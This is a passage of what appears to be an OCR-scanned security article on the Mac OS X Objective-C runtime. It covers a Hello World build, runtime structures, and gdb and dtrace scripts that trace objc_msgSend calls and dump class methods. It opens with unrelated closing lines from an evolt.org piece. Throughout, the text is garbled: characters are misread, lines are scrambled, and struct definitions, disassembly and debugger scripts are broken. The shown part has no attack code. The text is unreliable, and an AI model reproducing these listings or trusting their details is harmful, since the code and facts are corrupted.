the integrity of our organization, our community, our purpose, and our 
archives. We continue to welcome new members who want to contribute 
their talents and energy to the community, while learning new skills 
along the way. Like the internet itself, evolt.org is made of 
"imperfect, unreliable parts, connected together to create the most 
reliable thing we have." 


Here’s to a harmonious, productive, and successful next ten years. 


~------- [ EOF 
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--[ 1 - Introduction 


Hello reader. I am writing this paper to document some research which I 
undertook on Mac OS X around 3 years ago. 


At the time i prepared this research, I gave a talk on it at Ruxcon. 

It was a pretty terrible talk, dry and technical and it demotivated me a 
little. Unfortunately due to this i didn’t keep the slides. Around this 
time my laptop broke and Apple refused to fix it. This drove me away from 
Mac OS X for a while. A week ago, we tried again with another Apple store, 
just in case, and they seem to have fixed the problem. So i’m back on OS X 
and giving the documentation of this research another try. I’m hoping it 
transfers a little smoother in .txt format, however you be the judge. 


The topic of this research is the Objective-C runtime on Mac OS X. 
Basically, during the contents of this paper, i will look at how the 
Objective-C runtime works both in a binary, and in memory. I will then look 
at how we can manipulate the runtime to our advantage, from a reverse 
ngineering/exploit development and binary infection perspective. 


--[ 2 - What is Objective-C? 


Before we look at the Objective-C runtime, let’s take a look at what 
Objective-C actually is. 


Objective-C is a reflective programming language which aims to provide object 
orientated concepts and Smalltalk-esque messaging to C. 


Gece provides a compiler for Objective-C, however due to the rich library 
support on OpenStep based operating systems (Mac OS X, IPhone, GNUstep) it 
is typically only really used on these platforms. 


Objective-C is implemented as an augmentation to the C language. It is 
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a superset of C which means that any Objective-C compiler can also compile 
Cz 


[To learn more about Objective-C, you can read the [1] and [2] in the 
references. 


o illustrate what Objective-C looks like as a language we’1ll look at a simple 
Hello World example from [3]. This tutorial shows how to compile a basic 

Hello World style Objective-C app from the command line. If you’re already 
familiar with Objective-C just go ahead and skip to the next section. ;-) 


So first we make a directory for our project 


-—[dcbz@megatron:~/code]$ mkdir HelloWorld 
—[dcbz@megatron:~ /code]$ mkdir HelloWorld/build 


and create the header file for our new class (Talker.) 


—[dcbz@megatron:~/code]$ cat > HelloWorld/Talker.h 
#import <Foundation/Foundation.h> 


@interface Talker : NSObject 
— (void) say: (STR) phrase; 
@end 


“D 


As you can see, Objective-C projects use the .h extension 
just like C. This header looks pretty different to a typically C style 
header though. 


The "@interface Talker : NSObject" line basically tells the compiler that 
a "Talker" class exists, and it’s derived from the NSObject class. 


The "- (void) say: (STR) phrase;" line describes a public method of that 
class called "say". This method takes a (STR) argument called "phrase". 


Now that the header fil xists and our class is defined, we need to 
implement the meat of the class. Typically Objective-C files have the fil 
extension ".m". 


—[dcbz@megatron:~/code]$ cat > HelloWorld/Talker.m 
#import "Talker.h" 


@implementation Talker 


— (void) say: (STR) phrase { 
printf("%s\n", phrase); 


} 

@end 

“D 

Clearly the implementation for the Talker class is pretty straight 
forward. The say() method takes the string "phrase" and prints it with 


printf. 


Now that our class is layed down, we need to write a little main() 
function to use it. 


—[dcbz@megatron:~/code]$ cat > HelloWorld/hello.m 
#import "Talker.h" 


int main(void) { 
Talker *talker = [[Talker alloc] init]; 
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[talker say: "Hello, World!"]; 
[talker release]; 


From this example you can see that the syntax for calling methods of an 
Objective-C class is not quite the same as your typical C or C++ code. 
It looks far more like smalltalk messaging, or Lisp. 


[<object> <method>: <argument>]; 


Typically Objective-C programmers alloc and init on the same line, as shown 
in the example. I know this generally sets off alarm bells that a NULL 
pointer dereference can occur, however the Objective-C runtime has a check 
for a NULL pointer being passed to the runtime which catches this condition. 
(see the objc_msgSend source later in this paper.) 


Now we just build the project. The -framework option to gcc allows us to 
specify an Objective-C framework to link with. 


-—[dcbz@megatron:~/code]$ cd HelloWorld/ 
-—[dcbz@megatron:~/code/HelloWorld]$ gcc -o build/hello Talker.m 
hello.m -framework Foundation 
-—[dcbz@megatron:~ ,/code/HelloWorld]$ cd build/ 
—[dcbz@megatron: ~/code/HelloWorld/build]$ ./hello 
Hello, World! 


As you can see, the produced binary outputs "Hello, World!" as expected. 
Unfortunately, this example about showcases all the skill I have with 
Objective-C as a language. I’ve spent way more time auditing it than I have 
writing it. Fortunately you don’t really need a heavy understanding of 
Objective-C to follow the rest of the paper. 


[3 The Objective-C Runtime 


Now that we’re intimately familiar with Objective-C as a language, ;-) - We 
can begin to focus on the interesting aspects of Objective-C, the runtime 
that allows it to function. 


As I mentioned earlier in the Introduction section, Objective-C is a 
reflective language. The following quote explains this more clearly than i 
could (in a very academic manner :( ). 


ww 


Reflection is the ability of a program to manipulate as data something 
representing the state of the program during its own execution. There are 
two aspects of such manipulation : introspection and intercession. 
Introspection is the ability of a program to observe and therefore reason 
about its own state. Intercession is the ability of a program to modify its 
own execution state or alter its own interpretation or meaning. Both 
aspects require a mechanism for encoding execution state as data; providing 
such an encoding is called reification. 
www [4] 


Basically this means, that at runtime, Objective-C classes are designed to 
be aware of their own state, and be capable of altering their own 
implementation. As you can imagine, this information/functionality can be 
quite useful from a hacking perspective. 


So how is this implemented on Mac OS X? Firstly, when gcc compiles our 
hello.m application, it is linked with the "libobjc.A.dylib" library. 


ww 


—[dcbz@megatron: ~/code/HelloWorld/build]$ otool -L hello 
hello: 


/System/Library/Frameworks/Foundation. framework/Versions/C/Foundation 
(compatibility version 300.0.0, current version 677.22.0) 

/usr/lib/libgcec_s.1.dylib (compatibility version 1.0.0, current 
version 1.0.0) 
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/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current 


/usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current 


version 227.0.0) 


/System/Library/Frameworks/CoreFoundation. framework/Versions/A/CoreFoundation 


(compatibility version 150.0.0, current version 476.17.0) 


www 


Here’s 


The source code for this dylib is available from [5]. This library contains 
the code for manipulating our Objective-C classes at runtime. 


Also during compile time, gcc is responsible for storing all the 
information required by libobjc.A.dylib inside the binary. 
accomplished by creating the __OBJC segment. 
£ 
st 


This is 
I plan not to cover the Mach-O 


ile format in this paper, as it’s been done to death [6]. We’re more 
nterested in what the various sections contain. 


As you 


a list of the __OBJC segment in our binary and the sections 
contained (logically) within. 
LC_SEGMENT.__OBJC.__cat_cls_meth 
.C_SEGMENT.___OBJC.__cat_inst_meth 
LC_SEGMENT.__OBJC.__string_object 
iC_SEGMENT.__ OBJC.__cstring_object 
iC_SEGMENT.__ OBJC.__message_refs 
.C_SEGMENT.___ OBJC.__sel_fixup 
iC_SEGMENT.___ OBJC.__cls_refs 
iC_SEGMENT.___ OBJC.__class 
iC_SEGMENT.__ OBJC.__meta_class 
LC_SEGMENT.___OBJUC.__cls_meth 
LC_SEGMENT.__OBJC.__inst_meth 
LC_SEGMENT.__OBJC.__ protocol 
iC_SEGMENT.__ OBJC.__ category 
LC_SEGMENT.___ OBJUC.__class_vars 
LC_SEGMENT.__OBJC.__instance_vars 
.C_SEGMENT.__ OBJC.__ module_info 
iC_SEGMENT.___ OBJC.__symbols 
can see, quite a lot of information is stored in the file and 
therefore available at runtime.. 


We’1l1 
the fil 


look at both the in memory components of the Objective-C runtime and 


le contents in more detail in the following sections. 


3.1 - libobjc.A.dylib 


As mentioned previously, the file libobjc.A.dylib is a library file on Mac 
OS X which provides the in-memory runtime functionality of the Objective-C 


language. 


[The source code for this library is available from the apple website. [5]. 


Apple have documented the mechanics of this library quite well in the 


papers 


When I 


[7] & [8]. These papers show versions 1.0 and 2.0 of the runtime. 


last looked at the runtime 3 years ago, version 2.0 was the latest. 


However it seems that 3.0 is the standard now, and things have changed 
quite dramatically. I actually wrote a large portion of this section based 


on how 
Hopeful 


things used to be, and I had to go back and rewrite most of it. 
lly there aren’t any errors due to this. But please forgive me if 


there are. 


Probab] 


ly the first and most important function in this library is the 


"objc_msgSend" function. 


objc_msgSend() is used to send messages to an object in memory. All access 
to a method or attribute of an Objective-C object at runtime utilize this 
function. 
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Here is the description of this function, taken from the Objective-C 2.0 
Runtime Reference [7]. 


ww 


objc_msgSend(): 


Sends a message with a simple return value to an instance of a class. 


id objc_msgSend(id theReceiver, SEL theSelector, ...) 


Parameters: 
theReceiver 
A pointer that points to the instance of the class that is 
to receive the messag 
theSelector 
The selector of the method that handles the messag 
A variable argument list containing the arguments to 
the method. 
ReturnValue 


The return value of the method. 


ww 


In order to understand this function we need to first understand the 
structures used by this function. 


The first argument to objc_msgSend() is an "id" struct. The definition for 
this struct is in the file /usr/include/objc/objc.h. 


typedef struct objc_object { 
Class isa; 
} *id; 


typedef struct objc_class *Class; 


struct objc_class 
{ 
struct objc_class* isa; 
struct objc_class* super_class; 
const char* name; 
long version; 
long info; 
long instance_size; 
struct objc_ivar_list* ivars; 
struct objc_method_list** methodLists; 
struct objc_cache* cache; 
struct objc_protocol_list* protocols; 
}; 


As you can see, an id is basically a pointer to an "objc_class" instance in 
memory. 


I will now run through some of the more interesting elements of this 
struct. 


[The isa element is a pointer to the class definition for the object. 


The super_class element is a pointer to the base class for this object. 


The name element is just a pointer to the name of the object at runtime. 
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This is only really useful from a higher level perspectiv 


The ivars element is basically a way to represent all the instance 
variables of an object in memory. It consists of a pointer to an 
objc_ivar_list struct. This basically contains a count, followed by an 
array of count * objc_ivar structs. 


struct objc_ivar_list { 
int ivar_count 
/* variable length structure */ 
struct objc_ivar ivar_list[1] 


} 


The objc_ivar struct, consists of the name, and type of the variable. 
Both of which are simply char * as seen below. 


struct objc_ivar { 
char *ivar_name 
char *ivar_type 
int ivar_offset 


} 


The ivar_offset value indicates how far into the OBJC.__class_vars 
section to seek, to find the data used by this variable. 


The methodLists element is basically a list of the methods supported by 
the class. The objc_method_list struct is simply made up of an integer 
that dictates how many methods there are, followed by an array of struct 
objc_method’s. 


struct objc_method_list 
{ 


struct objc_method_list *obsolete; 

int method_count; 

struct objc_method method_list[1]; 
} 


typedef struct objc_method *Method; 


The objc_method struct contains a SEL, (our second argument to objc_msgSend 
too, while we’ll get to soon) which dictates the method_name, a string 
containing the argument types to the method. Finally this struct contains a 
function pointer for the method itself, of type IMP. 


struct objc_method { 

SEL method_name 
char *method_types 
IMP method_imp 


} 


id (*IMP) (id, SI 


Gl 

i 
~ 
~~ 


An IMP function pointer indicates that the first argument should be the 
classes "self" pointer, or the id (objc_class) pointer for the class. 
The second argument should be the methods’s SEL (selector). 


For now that’s all that’s interesting to us about the ID data type. Later 
on in this paper we’1ll look at how the method caching works, and how it can 
negatively affect us. 


Now let’s look at the mysterious data type "SEL" that we’ve been 
hearing so much about. The second argument to objc_msgSend. 


typedef struct objc_selector *SEL; 


And what is an objc_selector struct you ask? Turns out, it’s just a char * 
string that’s been processed by the runtime. 
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objc_msgSend() is implemented in assembly. To read it’s implementation 
browse to the runtime/Messengers.subproj directory in the objc-runtime 
source tree. The file objc-msg-i386.s is the intel implementation of 
this. 


Now that we’re some what familiar with the runtime, let’s take a look at 
our sample "hello" application we wrot arlier in a debugger and verify 
our progress. 


The most commonly used debugger on Mac OS X is gdb, obviously. Since I’ve 
spent so much time in the Windows world lately I am intel syntax inclined, 
I apologize in advance. 


Regardless, let’s fire up gdb and take a look at the source of our main 
function. 


-[dcebz@megatron:~/code/HelloWorld/build]$ gdb ./hello 

GNU gdb 6.3.50-20050815 (Apple version gdb-768) (Tue Oct 2 04:07:49 UTC 
2007) 

Copyright 2004 Free Software Foundation, Inc. 

(gdb) set disassembly-flavor intel 


(gdb) disas main 

Dump of assembler code for function main: 

Ox00001f3d <main+0>: push ebp 

Ox00001f3e <main+1>: mov ebp, esp 

Ox00001f40 <maint3>: push ebx 

Ox00001f41 <main+4>: sub esp, 0x24 

Ox00001f44 <maint7>: call Ox1lf£49 <main+12> 

0x00001f49 <main+12>: pop ebx 

O0x00001f4a <maint13>: lea ax, [ebx+0x117b] 

0x00001f£50 <maintl19>: mov eax,DWORD PTR [eax] 

Ox00001£52 <maint+21>: mov edx, eax 

O0x00001£54 <maint23>: lea ax, [ebx+0x1177] 

0x00001f5a <maint+29>: mov eax,DWORD PTR [eax] 

O0x00001f£5c <maint31>: mov DWORD PTR [espt+0x4],eax 
O0x00001£60 <maint+35>: mov DWORD PTR [esp],edx 

Ox00001f63 <main+38>: call 0x4005 <dyld_stub_objc_msgSend> 
OxO00001f68 <maint43>: mov edx, eax 

Ox00001f6a <maint45>: lea ax, [ebx+0x1173] 

OxO00001£70 <maint51>: mov eax,DWORD PTR [eax 

0x00001f72 <main+53>: mov DWORD PTR [espt+0x4],eax 
O0x00001f£76 <maint+57>: mov DWORD PTR [esp],edx 

0x00001f79 <main+60>: call 0x4005 <dyld_stub_objc_msgSend> 
Ox00001f7e <main+65>: mov DWORD PTR [ebp-Oxc],eax 
O0x00001f£81 <main+68>: mov ecx,DWORD PTR [ebp-Oxc] 
0x00001f£84 <main+71>: lea ax, [ebx+0x116f] 

Ox00001f8a <maint77>: mov edx,DWORD PTR [eax 

OxO00001f8c <maint79>: lea ax, [ebx+0x96] 

0x00001f92 <main+85>: mov DWORD PTR [espt+0x8],eax 
OxO00001f96 <main+89>: mov DWORD PTR [espt+0x4],edx 
Ox00001f9a <main+93>: mov DWORD PTR [esp],ecx 

Ox00001f9d <main+96>: Gali. 0x4005 <dyld_stub_objc_msgSend> 
O0x00001fa2 <maint+101>: mov edx,DWORD PTR [ebp-Oxc] 
O0x00001fa5 <maint+104>: lea ax, [ebx+0x116b] 

O0x00001lfab <maint+110>: mov eax,DWORD PTR [eax] 

O0x00001lfad <maint+t112>: mov DWORD PTR [espt+0x4],eax 
OxO00001fb1 <maint+116>: mov DWORD PTR [esp],edx 

Ox00001fb4 <main+119>: call 0x4005 <dyld_stub_objc_msgSend> 
OxO00001fb9 <main+124>: add esp, 0x24 

0x00001fbc <main+127>: pop ebx 

Ox00001fbd <maint+128>: leave 

Ox00001fbe <maint129>: ret 

As you can see, our main function only consists of 4 calls to 
objc_msgSend(). There are no calls to our actual methods here. 


Here is a listing of the source code again, to jog your memory. 


int main(void) { 
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Talker *talker = [[Talker alloc] init]; 
[talker say: "Hello World!"]J; 
[talker release]; 


} 


Each call to objc_msgSend() corresponds to each method call 
in our source. 


class | method 
Talker | alloc 
talker | init 
talker | say 
talker | release 


To verify this we can put a breakpoint on the objc_msgSend() function. 


(gdb) break objc_msgSend 
Breakpoint 2 at 0x9470d670 
(gdb) c 

Continuing. 


Breakpoint 2, 0x9470d670 in objc_msgSend () 

(gdb) x/2i Spc 

0x9470d670 <objc_msgSend>: mov ecx,DWORD PTR [esp+0x8] 
0x9470d674 <objc_msgSendt4>: mov eax,DWORD PTR [esp+0x4] 


As you can see, the first two instructions in objc_msgSend() are 
responsible for moving the id into eax, and the selector into ecx. 


To verify, lets step and print the contents of ecx. 


(gdb) stepi 

0x9470d674 in objc_msgSend () 

(gdb) x/s Secx 

0x9470e66c <objc_msgSend_stubt828>: Ta Lloc™ 


As predicted "alloc" was the first method called. 


Now we can delete our breakpoints, and add a breakpoint at the current 
location. Then use the "commands" option in gdb to print the string at ecx, 
every time this breakpoint is hit. 


(gdb) break 

Breakpoint 3 at 0x9470d674 

(gdb) commands 

Type commands for when breakpoint 3 is hit, one per line. 
End with a line saying just "end". 

>x/s Secx 

2G 

>end 

(gdb) c 

Continuing. 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
0x94722da20 <__FUNCTION__.12370+80320>: "defaultCenter" 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
0x9470e83c <objc_msgSend_stub+1292>: "self" 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
0x94772da28 <__FUNCTION__.12370+408008>: 
"addObserver:selector:name:object:" 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
0x9470e66c <objc_msgSend_stubt+828>: "alloc" 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
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0x9470e680 <objc_msgSend_stubt+848>: "initialize" 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
0x9477£158 <__FUNCTION__.12370+458232>: "“allocWithZone:" 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
0x9470e858 <objc_msgSend_stub+1320>: Yin" 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
OxlfdO <main+147>: "say:" 
Hello World! 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
0x947a9334 <__FUNCTION__.12370+630740>: "release" 


Breakpoint 8, 0x9470d674 in objc_msgSend () 
0x9474e514 <__FUNCTION__.12370+258484>: "dealloc" 


This works as expected. However, we can see that we were flooded with 
methods that weren’t related to our class from the NS runtime loading. 
Let’s try to implement something to see which class methods were called on. 


Remembering back to our objc_class struct: 


struct objc_class 

{ 
struct objc_class* isa; 
struct objc_class* super_class; 
const char* name; 


8 bytes into the struct there’s a 4 byte pointer to the class’s name. 


To verify this, we can restart the process with our breakpoint in the same 
place. 


Breakpoint 6, 0x9470d674 in objc_msgSend () 
(gdb) printf "%s\n", *(long*) (Seaxt8) 
NSNotificationCenter 


This time when it’s hit, we deref the pointer at S$eax+8 and print it to 
find out the class name. 


Again we can script this with the "commands" option to automate the process. 
But lets change our code so that rather than using printf, we utilize one 
of the functions exported by our objective-c runtime: 


call (char *)class_getName (Seax) 
This function will do the work for us just with our ID. 


(gdb) b *0x9470d674 

Breakpoint 1 at 0x9470d674 

(gdb) commands 

Type commands for when breakpoint 1 is hit, one per line. 
End with a line saying just "end". 

>call (char *)class_getName (Seax) 

>x/s Secx 

>Cc 

>end 

(gdb) run 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$107 = Ox6e6f5a68 <Address O0x6e6f5a68 out of bounds> 
0x9477£158 <__FUNCTION__.12370+458232>: "allocWithZone:" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$108 = 0x0 
0x94772d28 <__FUNCTION__.12370+408008>: 
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"addObserver:selector:name:object:" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$109 = 0x916e0318 "NSNotificationCenter" 
0x94722d20 <__FUNCTION__.12370+80320>: "defaultCenter" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$110 = 0x916e0318 "NSNotificationCenter" 
0x9470e83c <objc_msgSend_stub+1292>: "self" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$111 = 0x0 

0x94772da28 <__FUNCTION__.12370+408008>: 
"addObserver:selector:name:object:" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$112 = 0x77656e <Address 0x77656e out of bounds> 
0x9470e66c <objc_msgSend_stubt+828>: "alloc" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$113 = Oxlfc9 "Talker" 
0x9470e680 <objc_msgSend_stubt+848>: "initialize" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$114 = Oxlfc9 "Talker" 
0x9477£158 <__FUNCTION__.12370+458232>: "allocWithZone:" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$115 = 0x6b617761 <Address 0x6b617761 out of bounds> 
0x9470e858 <objc_msgSend_stub+1320>: "init" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 

$116 = 0x21646c72 <Address 0x21646c72 out of bounds> 
Oxlfd0O <main+147>: "say:" 

Hello World! 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$117 = 0x6470755f <Address 0x6470755f out of bounds> 
0x947a9334 <__FUNCTION__.12370+630740>: "release" 


Breakpoint 2, 0x9470d674 in objc_msgSend () 
$118 = 0x615f£4943 <Address 0x615f4943 out of bounds> 
0x9474e514 <__FUNCTION__.12370+258484>: "dealloc" 


And as you can see, this works as sort of a make shift, objective-c messag 
tracing system. 


However in some cases, ax does not actually contain an id. And this will 
not work. Hence we get the messages lik 


$118 = 0x615f4943 <Address 0x615f4943 out of bounds> 


This is due to the fact that objc_msgSend() is not always an entry point. 
So we can’t guarantee that every time our breakpoint is hit we are actually 
seeing a call to objc_msgSend(). 


To make our tracer work mor ffectively we can put a breakpoint on 
0x4005 <dyld_stub_objc_msgSend> instead. This means we have to use espt0x8 
for our SEL and esp+0x4 for our ID. 


We can use the statement: 
printf "([%s Ss]\n", *(long *) ((* (long*) (Sesp+4))+8),* (long *) (Sespt8) 


To print our object and method nicely. 


This works pretty well but we still hit a situation where sometimes our 
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class’s name is set to NULL. In this case we take the isa (deref the first 
pointer in the struct) and get the name of that. 


The following gdb script will handle this: 


Trace objective-c messages. nemo 2009 


b dyld_stub_objc_msgSend 


commands 
set Sid = *(long *) (Sesp+4) 
set Ssel = *(long *) (Sesp+8) 
if(* (long *) ($id+8) != 0) 
printf "({%s Ss]\n", *(long *) ($id+8),S$sel 
continue 
end 
set Sisx = *(long *) (Sid) 
printf "({%s Ss]\n", *(long *) ($isx+8),Ssel 
continue 
end 


We could also implement this with dtrace on Mac OS X quite easily. 
#!/usr/sbin/dtrace -qs 
/* usage: objcdump.d <pid> */ 


pid$S1::objc_msgSend:entry 
{ 
self->isa 
printet ("=[ 
4)),copyinstr(argl) 


*(long *)copyin(arg0O, 4); 
s $s]\n",copyinstr(* (long *)copyin(self->isa + 8, 
) 


co) 
cod 


’ 


} 


Let me correct myself on that, we /should/ be able to implement this with 
dtrace on Mac OS X quite easily. However, dtrace is kind of like looking at 
a beautiful painting through a kids kaleidescope toy. Thanks a lot to twiz 
for helping me out with implementing this. 


As you can see, the output of this script is the same as our gdb script, 
however the speed at which the process runs is magnitudes faster. 


Now that we’re hopefully familiar with how calls to objc_msgSend() work we 
can look at how the ivar’s and methods are accessed. 


In order to investigate this a little, we can modify our hello.m example 
code a little to include some attributes. To demonstrate this I will use 
the fraction example from [10]. (I’m getting uncreative in my old age ;-) 


—[dcbz@megatron:~ /code/fraction]$ ls -lsa 

total 24 

QO drwxr-xr-x 5: debz. <dcbz 170 Mar 27 10:28 

drwxr-xr-x 33 dcbz dcbz 1122 Mar 27 10:17 .. 

—rwxr----— 1 dcbz dcbz 231 Mar 23 2004 Fraction.h 
1 dcbz dcbz 339 Mar 24 2004 Fraction.m 
1 dcbz dcbz 386 Mar 27 2004 main.m 


lookoomncome) 


As you can see, this project is pretty similar to our earlier hello.m 
example. 


—[dcbz@megatron:~ /code/fraction]$ cat Fraction.h 
#import <Foundation/NSObject.h> 


@interface Fraction: NSObject { 
int numerator; 
int denominator; 
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void) print; 

void) setNumerator: (int) d; 
void) setDenominator: (int) 
int) numerator; 

-—(int) denominator; 

@end 


d; 


Our header file defines a simple interface to a "Fraction" class. This 
class represents the numerator and denominator of a fraction. 


It exports the methods setNumerator and setDemonimator in order to modify 
these values, and the methods numerator() and denominator() to get the 
values. 


—[dcbz@megatron:~ /code/fraction]$ cat Fraction.m 
import "Fraction.h" 
import <stdio.h> 


@implementation Fraction 
—(void) print { 


printf( "%Si/%Si", numerator, denominator ); 
} 
—(void) setNumerator: (int) n { 
numerator = n; 
} 
—(void) setDenominator: (int) d { 
denominator = d; 


} 


—(int) denominator { 
return denominator; 


} 


-—(int) numerator { 
return numerator; 

} 

@end 


The actual implementation of these methods is pretty much what you would 
expect from any OOP language. Get methods return the object’s attribute, set 
methods set it. 


—[dcbz@megatron:~ /code/fraction]$ cat main.m 
import <stdio.h> 
import "Fraction.h" 


int main( int argc, const char *argv[] ) { 
// create a new instance 
Fraction *frac = [[Fraction alloc] init]; 


// set the values 
[frac setNumerator: 1]; 
[frac setDenominator: 3]; 


// print it 

printf( "The fraction is: " ); 
[frac print]; 

printf( "\n" ); 


// £ree memory 
[frac release]; 


return 0; 
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As you can see, our main.m file contains code to instantiate an instance of 
the class. It then sets the numerator to 1 and denominator to 3, and prints 
the fraction. Pretty straight forward stuff. 


—[dcbz@megatron:~/code/fraction]$ gcc -o fraction Fraction.m main.m 
-framework Foundation 

—[dcbz@megatron:”~/code/fraction]$ ./fraction 

The fraction is: 1/3 


Before we fire up gdb and look at this from a debugging perspective, lets 
take a quick look through the source code for what happens after 
objc_msgSend() is called. 


ENTRY _objc_msgSend 
CALL MCOUNTER 


// load receiver and selector 


movl selector(%esp), %ecx 
movl self(%sesp), %eax 


// check whether selector is ignored 


cmpl S$ kIgnore, %ecx 
je LMsgSendDone // return self from %eax 


// check whether receiver is nil 


testl Seax, %eax 
je LMsgSendNilSelf 


// veceiver (in %eax) is non-nil: search the cache 


LMsgSendReceiverOk: 
movl isa(%eax), %edx // class = self->isa 
CacheLookup WORD_RETURN, MSG_SEND, LMsgSendCacheMiss 
movl SkFwdMsgSend, %edx // flag word-return for 
_objc_msgForward 
jmp *Seax // goto *imp 


// cache miss: go search the method lists 


LMsgSendCacheMiss: 

MethodTableLookup WORD_RETURN, MSG_SEND 

movl SkFwdMsgSend, %edx // flag word-return for 
_objc_msgForward 

jmp *Seax // goto *imp 


As you can see, objc_msgSend() first moves the receiver and selector into 
eax and ecx respectively. It then tests if the selector is kignore ("?"). 
If this is the case, it simply returns the receiver (id). 


If the receiver is not NULL, a cache lookup is performed on the method in 
question. If the method is found in the cache, the value in the cache is 
simply called. We’1ll look into the cache in more detail later in the 
exploitation section. 


If the method’s address is not in the cache, the "MethodTableLookup" macro 
is used. 


-macro MethodTableLookup 


subl SS4, %esp // 16-byte align the stack 

// push args (class, selector) 

pushl SECX 

pushl seax 

CALL_EXTERN (__class_lookupMethodAndLoadCache) 

addl $$12, %esp // pop parameters and alignment 
.endmacro 


From the code above we can see that this macro simply aligns the stack and calls 
__class_lookupMethodAndLoadCache. 
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This function, checks the cache of the class again, and it’s super class 
for the method in question. If it’s definitely not in the cache, the method 
list in the class is walked and tested individually for a match. If this 

is not successful the parent of the class is checked and so forth. 

If the method is found, it’s called. 


Let’s look at this process in gdb. 
We hit out breakpoint in objc_msgSend(). 


Breakpoint 7, 0x9470d670 in objc_msgSend () 


(gdb) stepi 
0x9470d674 in objc_msgSend () 
(gdb) stepi 


0x9470d678 in objc_msgSend () 


Step over the first two instructions to populate ecx and eax, for our 
convenience. 


(gdb) x/s Secx 
Oxlf8d <main+244>: "setNumerator:" 


We can see the method being called (from the SEL argument) is setNumerator: 


(gdb) x/x Seax 
0x103240: 0x00003000 


We take the ISA... 


(gdb) x/x 0x00003000 


0x3000 <.objc_class_name_Fraction>: 0x00003040 
(gdb) 
0x3004 <.objc_class_name_Fraction+4>: Oxa07f£ccc0 
(gdb) 
0x3008 <.objc_class_name_Fraction+8>: 0x00001f7e 


Offset this by 8 bytes to find the class name. 


(gdb) x/s 0x00001f7e 
Oxlf7e <main+229>: "Fraction" 


So this is a call to -[Fraction setNumerator:] (obviously). 


struct objc_class 
{ 
struct objc_class* isa; 
struct objc_class* super_class; 
const char* name; 
long version; 
long info; 
long instance_size; 
struct objc_ivar_list* ivars; 
struct objc_method_list** methodLists; 
struct objc_cache* cache; 
struct objc_protocol_list* protocols; 


}; 


Remembering our objc_class struct from earlier, we know that the 
method_lists struct is 28 bytes in. 


(gdb) set Sclassbase=0x3000 
(gdb) x/x Sclassbase+28 
Ox301lc <.objc_class_name_Fractiont+28>: 0x00103250 


So the address of our method_list is 0x00103250. 
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struct objc_method_list 
{ 
struct objc_method_list *obsolete; 
int method_count; 
struct objc_method method_list[1]; 
} 


As you can see, our method_count is 5. 


(gdb) x/x 0x00103250+4 
0x103254: 0x00000005 
typedef struct objc_method *Method; 
struct objc_method { 
SEL method_name 
char *method_types 
IMP method_imp 
} 
(gdb) x/3x 0x00103250+8 
0x103258: O0x00001fb7 0x00001fd2 
(gdb) x/s 0x00001fb7 
Oxlfb7 <main+286>: "numerator" 
(gdb) x/7i 0x00001e8b 
Oxle8b <-[Fraction numerator]>: push 
Oxle8c <-[Fraction numerator]+1>: mov 
Oxle8e <-[Fraction numerator]+3>: sub 
Oxle91 <-[Fraction numerator]+6>: mov 
Oxle94 <-[Fraction numerator]+9>: mov 
Oxle97 <-[Fraction numerator]+12>: leave 
Oxle98 <-[Fraction numerator]+13>: ret 


Now that we see clearly how methods are stored, 
of gdb script to dump them. 


(gdb) set Smethods = 0x00103250 + 8 
(gdb) set Si =1 

(gdb) while(Si <= 5) 

>printf "name: %s\n", *(long *)S$methods 
>printf "addr: 0x%x\n", *(long *) (Smethods+8) 
>set Smethods += 12 

>set Sitt 

>end 

name: numerator 

addr: Oxle8b 

name: denominator 

addr: Oxle7vd 

name: setDenominator: 

addr: Oxle6c 

name: setNumerator: 

addr: Oxle5b 

name: print 

addr: 0xle26 


so 


We can now clearly display all 
and get methods actually work. 


our methods, 


0x00001e8b 


ebp 

ebp,esp 

esp, 0x8 
eax,DWORD PTR 
eax,DWORD PTR 


[ebp+0x8 ] 
[eaxt0x4] 


we can write a small amount 


lets take a look at how our set 


Firstly, lets take a look at the setDenominator method. 

(gdb) x/8i Oxle6éc 

Oxle6c <-[Fraction setDenominator:]>: push ebp 

Oxle6d <-[Fraction setDenominator:]+1> mov ebp, esp 

Oxle6f <-[Fraction setDenominator:]+3>: sub esp, 0x8 

Oxle72 <-[Fraction setDenominator:]+6>: mov edx,DWORD PTR [ebpt0x8] 
Oxle75 <-[Fraction setDenominator:]+9>: mov eax,DWORD PTR [ebpt+0x10] 
Oxle78 <-[Fraction setDenominator:]+12>: mov DWORD PTR [edx+0x8],eax 
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Oxle7b <-[Fraction setDenominator:]+15>: leave 
Oxle7c <-[Fraction setDenominator:]+16>: ret 


As you can see from the implementation, this function basically takes a 
pointer to the instance of our Fraction class, and stores the argument we 
pass to it at offset 0x8. 


Oxle5b <-[Fraction setNumerator:]>: push ebp 

Oxle5c <-[Fraction setNumerator:]+1>: mov ebp, esp 

Oxle5Se <-[Fraction setNumerator:]+3>: sub esp, 0x8 

Oxle61 <-[Fraction setNumerator:]+6>: mov edx,DWORD PTR [ebpt0x8] 
Oxle64 <-[Fraction setNumerator:]+9>: mov eax,DWORD PTR [ebp+0x10] 
Oxle67 <-[Fraction setNumerator:]+12>: mov DWORD PTR [edx+0x4],eax 
Oxle6a <-[Fraction setNumerator:]+15>: leave 

Oxle6b <-[Fraction setNumerator:]+16>: ret 


Our setNumerator method is almost identical to this, however it uses offset 
Ox4 instead this is all pretty straight forward. So what’s the ivars pointer 
that we saw earlier in our objc_class struct for then, you ask? 


